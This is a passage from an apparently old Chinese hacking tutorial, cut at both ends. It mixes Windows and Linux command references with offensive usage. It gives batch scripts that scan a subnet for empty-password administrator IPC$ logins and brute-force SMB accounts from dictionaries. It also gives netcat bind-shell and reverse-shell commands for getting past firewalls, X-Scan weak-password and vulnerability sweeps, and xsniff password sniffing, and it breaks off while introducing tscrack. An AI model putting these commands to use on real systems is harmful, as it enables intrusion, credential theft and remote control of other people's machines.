参数说明:/PID 要终止进程的pid,可用tasklist命令获得各进程的pid,/IM 要终止的进程的进程名,/F 强制终止进程,/T 终止指定的进程及他所启动的子进程。

tasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。

参数说明:/M 列出当前进程加载的dll文件,/SVC 显示出每个进程对应的服务,无参数时就只列出当前的进程

#6 六:

Linux系统下基本命令: 要区分大小写

uname 显示版本信息(同win2K的 ver)

dir 显示当前目录文件,ls -al 显示包括隐藏文件(同win2K的 dir)

pwd 查询当前所在的目录位置

cd cd ..回到上一层目录,注意cd 与..之间有空格。cd /返回到根目录。

cat 文件名 查看文件内容

cat abc.txt 往abc.txt文件中写上内容。

more 文件名 以一页一页的方式显示一个文本文件。

cp 复制文件

mv 移动文件

rm 文件名 删除文件,rm -a 目录名删除目录及子目录

mkdir 目录名 建立目录

rmdir 删除子目录,目录内没有文档。

chmod 设定档案或目录的存取权限

grep 在档案中查找字符串

diff 档案文件比较

find 档案搜寻

date 现在的日期、时间

who 查询目前和你使用同一台机器的人以及Login时间地点

w 查询目前上机者的详细资料

whoami 查看自己的帐号名称

groups 查看某人的Group

passwd 更改密码

history 查看自己下过的命令

ps 显示进程状态

kill 停止某进程

gcc 黑客通常用它来编译C语言写的文件

su 权限转换为指定使用者

telnet IP telnet连接对方主机(同win2K),当出现bash$时就说明连接成功。

ftp ftp连接上某服务器(同win2K)


1:for命令及变量 基本格式:

FOR /参数 %variable IN (set) DO command [command_parameters] %variable:指定一个单一字母可替换的参数,如:%i ,而指定一个变量则用:%%i ,而调用变量时用:%i% ,变量是区分大小写的(%i 不等于 %I)。

批处理每次能处理的变量从%0—%9共10个,其中%0默认给批处理文件名使用,%1默认为使用此批处理时输入的的第一个值,同理:%2—%9指输入的第2-9个值;例:net use \\ip\ipc$ pass /user:user 中ip为%1,pass为%2 ,user为%3

(set):指定一个或一组文件,可使用通配符,如:(D:\user.txt)和(1 1 254)(1 -1 254),{ “(1 1 254)”第一个"1"指起始值,第二个"1"指增长量,第三个"254"指结束值,即:从1到254;“(1 -1 254)”说明:即从254到1 }

command:指定对第个文件执行的命令,如:net use命令;如要执行多个命令时,命令这间加: 来隔开


IN (set):指在(set)中取值;DO command :指执行command

参数:/L 指用增量形式{ (set)为增量形式时 };/F 指从文件中不断取值,直到取完为止{ (set)为文件时,如(d:\pass.txt)时 }。


@echo off

echo 用法格式:test.bat *.*.* test.txt

for /L %%G in (1 1 254) do echo %1.%%G test.txt net use \\%1.%%G /user:administrator | find "命令成功完成" test.txt

存为test.bat 说明:对指定的一个C类网段的254个IP依次试建立administrator密码为空的IPC$连接,如果成功就把该IP存在test.txt中。

/L指用增量形式(即从1-254或254-1);输入的IP前面三位:*.*.*为批处理默认的 %1;%%G 为变量(ip的最后一位); 用来隔开echo 和net use 这二个命令;| 指建立了ipc$后,在结果中用find查看是否有"命令成功完成"信息;%1.%%G 为完整的IP地址;(1 1 254) 指起始值,增长量,结止值。

@echo off

echo 用法格式:ok.bat ip

FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200

存为:ok.exe 说明:输入一个IP后,用字典文件d:\pass.dic来暴解d:\user.dic中的用户密码,直到文件中值取完为止。%%i为用户名;%1为输入的IP地址(默认)。

#7 七:

2:if命令及变量 基本格式:

IF [not] errorlevel 数字 命令语句 如果程序运行最后返回一个等于或大于指定数字的退出编码,指定条件为“真”。

例:IF errorlevel 0 命令 指程序执行后返回的值为0时,就值行后面的命令;IF not errorlevel 1 命令指程序执行最后返回的值不等于1,就执行后面的命令。

0 指发现并成功执行(真);1 指没有发现、没执行(假)。

IF [not] 字符串1==字符串2 命令语句 如果指定的文本字符串匹配(即:字符串1 等于 字符串2),就执行后面的命令。

例:“if "%2%"=="4" goto start”指:如果输入的第二个变量为4时,执行后面的命令(注意:调用变量时就%变量名%并加" ")

IF [not] exist 文件名 命令语句 如果指定的文件名存在,就执行后面的命令。

例:“if not nc.exe goto end”指:如果没有发现nc.exe文件就跳到":end"标签处。

IF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字符串2 命令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加上:else 命令语句后指:当前面的条件不成立时,就指行else后面的命令。注意:else 必须与 if 在同一行才有效。 当有del命令时需把del命令全部内容用 括起来,因为del命令要单独一行时才能执行,用上 后就等于是单独一行了;例如:“if exist test.txt. del test.txt. else echo test.txt.missing ”,注意命令中的“.”




-h 查看帮助信息

-d 后台模式

-e prog程序重定向,一但连接就执行〔危险〕

-i secs延时的间隔

-l 监听模式,用于入站连接

-L 监听模式,连接天闭后仍然继续监听,直到CTR+C

-n IP地址,不能用域名

-o film记录16进制的传输

-p[空格]端口 本地端口号

-r 随机本地及远程端口

-t 使用Telnet交互方式

-u UDP模式

-v 详细输出,用-vv将更详细

-w数字 timeout延时间隔

-z 将输入,输出关掉(用于扫锚时)


nc -nvv 80 连接到192.168.0.1主机的80端口

nc -l -p 80 开启本机的TCP 80端口并监听

nc -nvv -w2 -z 80-1024 扫锚192.168.0.1的80-1024端口

nc -l -p 5354 -t -e c:winntsystem32cmd.exe 绑定remote主机的cmdshell在remote的TCP 5354端口

nc -t -e c:winntsystem32cmd.exe 5354 梆定remote主机的cmdshell并反向连接192.168.0.2的5354端口


nc -L -p 80 作为蜜罐用1:开启并不停地监听80端口,直到CTR+C为止

nc -L -p 80 c:\log.txt 作为蜜罐用2:开启并不停地监听80端口,直到CTR+C,同时把结果输出到c:\log.txt

nc -L -p 80 c:\honeyport.txt 作为蜜罐用3-1:开启并不停地监听80端口,直到CTR+C,并把c:\honeyport.txt中内容送入管道中,亦可起到传送文件作用

type.exe c:\honeyport | nc -L -p 80 作为蜜罐用3-2:开启并不停地监听80端口,直到CTR+C,并把c:\honeyport.txt中内容送入管道中,亦可起到传送文件作用

本机上用:nc -l -p 本机端口

在对方主机上用:nc -e cmd.exe 本机IP -p 本机端口 *win2K

nc -e /bin/sh 本机IP -p 本机端口 *linux,unix 反向连接突破对方主机的防火墙

本机上用:nc -d -l -p 本机端口 要传送的文件路径及名称

在对方主机上用:nc -vv 本机IP 本机端口 存放文件的路径及名称 传送文件到对方主机

备 注:

| 管道命令

或 重定向命令。“”,例如:tlntadmn test.txt 指把test.txt的内容赋值给tlntadmn命令

@ 表示执行@后面的命令,但不会显示出来(后台执行);例:@dir c:\winnt d:\log.txt 意思是:后台执行dir,并把结果存在d:\log.txt中

与的区别 ""指:覆盖;""指:保存到(添加到)。

如:@dir c:\winnt d:\log.txt和@dir c:\winnt d:\log.txt二个命令分别执行二次比较看:用的则是把二次的结果都保存了,而用:则只有一次的结果,是因为第二次的结果把第一次的覆盖了。

#8 八:



xscan -host 起始IP[-终止IP] 检测项目 [其他选项] 扫锚"起始IP到终止IP"段的所有主机信息

xscan -file 主机列表文件名 检测项目 [其他选项] 扫锚"主机IP列表文件名"中的所有主机信息


-active 检测主机是否存活

-os 检测远程操作系统类型(通过NETBIOS和SNMP协议)

-port 检测常用服务的端口状态

-ftp 检测FTP弱口令

-pub 检测FTP服务匿名用户写权限

-pop3 检测POP3-Server弱口令

-smtp 检测SMTP-Server漏洞

-sql 检测SQL-Server弱口令

-smb 检测NT-Server弱口令

-iis 检测IIS编码/解码漏洞

-cgi 检测CGI漏洞

-nasl 加载Nessus攻击脚本

-all 检测以上所有项目


-i 适配器编号 设置网络适配器, 适配器编号可通过"-l"参数获取

-l 显示所有网络适配器

-v 显示详细扫描进度

-p 跳过没有响应的主机

-o 跳过没有检测到开放端口的主机

-t 并发线程数量,并发主机数量 指定最大并发线程数量和并发主机数量, 默认数量为100,10

-log 文件名 指定扫描报告文件名 (后缀为:TXT或HTML格式的文件)


xscan -host -all -active -p 检测192.168.1.1-网段内主机的所有漏洞,跳过无响应的主机

xscan -host -port -smb -t 150 -o 检测192.168.1.1-网段内主机的标准端口状态,NT弱口令用户,最大并发线程数量为150,跳过没有检测到开放端口的主机

xscan -file hostlist.txt -port -cgi -t 200,5 -v -o 检测“hostlist.txt”文件中列出的所有主机的标准端口状态,CGI漏洞,最大并发线程数量为200,同一时刻最多检测5台主机,显示详细检测进度,跳过没有检测到开放端口的主机

#9 九:

3、命令行方式嗅探器: xsniff.exe



-tcp 输出TCP数据报

-udp 输出UDP数据报

-icmp 输出ICMP数据报

-pass 过滤密码信息

-hide 后台运行

-host 解析主机名

-addr IP地址 过滤IP地址

-port 端口 过滤端口

-log 文件名 将输出保存到文件

-asc 以ASCII形式输出

-hex 以16进制形式输出


xsniff.exe -pass -hide -log pass.log 后台运行嗅探密码并将密码信息保存在pass.log文件中

xsniff.exe -tcp -udp -asc -addr 嗅探192.168.1.1并过滤tcp和udp信息并以ASCII格式输出

4、终端服务密码破解: tscrack.exe


-h 显示使用帮助

-v 显示版本信息

-s 在屏幕上打出解密能力

-b 密码错误时发出的声音

-t 同是发出多个连接(多


